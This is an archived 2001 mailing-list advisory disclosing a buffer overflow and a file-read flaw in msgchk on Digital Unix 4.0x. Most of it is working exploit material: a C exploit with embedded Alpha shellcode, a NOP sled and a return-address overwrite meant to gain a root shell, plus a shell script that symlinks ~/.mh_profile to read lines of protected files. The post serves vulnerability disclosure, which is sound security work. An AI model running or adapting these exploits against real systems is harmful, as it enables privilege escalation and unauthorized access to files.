hi everyone. there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital unix 4.0x it's a mail utility - check for messages (only available within the message handlin system, mh) two vulnerabilities were found. /usr/bin/mh/msgchk is affected to buffer overflow vulnerability -- snip -- $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'` AAAAAAAAAAAAA ... ... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA : msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ... AAAAAAAAAAAAAAAAAAAAAAA Memory fault(coredump) -- snip -- exploit code is followed end of this document. Next , /usr/bin/mh/msgchk has a vulnerability that anyone read 1 line of the unprivileged file on the system it's a old bug on redhat linux 2.0, but it also works on digital unix 4.0x exploit script is also followed end of this document too. i didn't test it on other version of digital unix or tru64 unix , but 4.0d if stack is excutable, then overflow bug have you get root privilege , bug of ~/.mh_profile file control would make you read 1 line of unprivileged file on the system. ++ msgchkx.c /* * 2001/09/05 - at the bench of windy fall * /usr/bin/mh/msgchk buffer overflow exploit code by truefinder , seoat_private * now we will drill /usr/bin/mh/msgchk * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define NOP 0x47ff041f #define ALIGNSIZE (4 + 1 ) #define BUFSIZE (8000 + 211 ) #define RETADDR 0x000000011ffffaa0 #define DEFNOPSIZE 7168 char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 }; char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 }; static char shellcode[] = "\x30\x15\xd9\x43" /* subq $30,200,$16 */ "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */ "\x12\x94\x07\x42" /* addq $16,60,$18 */ "\xfc\xff\x32\xb2" /* stl $17,-4($18) */ "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */ "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */ "\xfc\xff\x30\xb2" /* stl $17,-4($16) */ "\xf9\xff\x1f\xd2" /* bsr $16,-28 */ "\x30\x15\xd9\x43" /* subq $30,200,$16 */ "\x31\x15\xd8\x43" /* subq $30,192,$17 */ "\x12\x04\xff\x47" /* clr $18 */ "\x40\xff\x1e\xb6" /* stq $16,-192($30) */ "\x48\xff\xfe\xb7" /* stq $31,-184($30) */ "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */ "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */ "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */ "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */ "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */ "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */ "\x38\xff\x7e\xb2" /* stl $19,-200($30) */ "\x13\x94\xe7\x43" /* addq $31,60,$19 */ "\x20\x35\x60\x42" /* subq $19,1,$0 */ "\xff\xff\xff\xff"; /* callsys ( disguised ) */ /* oh! this is ohhara's shellcode */ int main(int argc, char *argv[] ) { char *buf , *buf_ptr; int bufsize , alignsize , offset ; int i, totalsize; bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ; if ( argc < 1 ) { printf("usage : %s <bufsize> <align> <offset>\n", argv[0]); exit (-1); } if (argc > 1 ) bufsize = atoi( argv[1] ); if ( argc > 2 ) alignsize = atoi( argv[2] ) + ALIGNSIZE ; if ( argc > 3 ) offset = atoi ( argv[3] ); totalsize = alignsize + bufsize ; buf = malloc( totalsize ) ; memset ( buf, NULL , totalsize ); memset ( buf, 'A', alignsize ); buf_ptr = (char *)(buf + alignsize ); /* default nop size is 4096 bytes */ for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ ) strcat ( buf_ptr , nop ); strcat ( buf_ptr, shellcode ); /* fill the block with 'A' */ for ( i =0 ; i < bufsize - DEFNOPSIZE - strlen(shellcode) - 8 ; i++ ) strcat( buf_ptr ,"A"); strcat ( buf_ptr , retaddr ); execl ("/var/tmp/mh/msgchk", "msgchk", buf, NULL ); } ++ msgchkx.sh #!/bin/sh # truefinder, seoat_private # msgchk file read vulnerability if [ ! -f $1 ] then echo "usage : $0 <file path>" fi cd ~ ln -sf $1 ~/.mh_profile /usr/bin/mh/msgchk EOF ++ Seunghyun Seo , Inha university Group of Research for Unix Security [e-mail] seoat_private , [office] Inha university 4-207 , Incheon
This archive was generated by hypermail 2b30 : Mon Sep 10 2001 - 09:44:30 PDT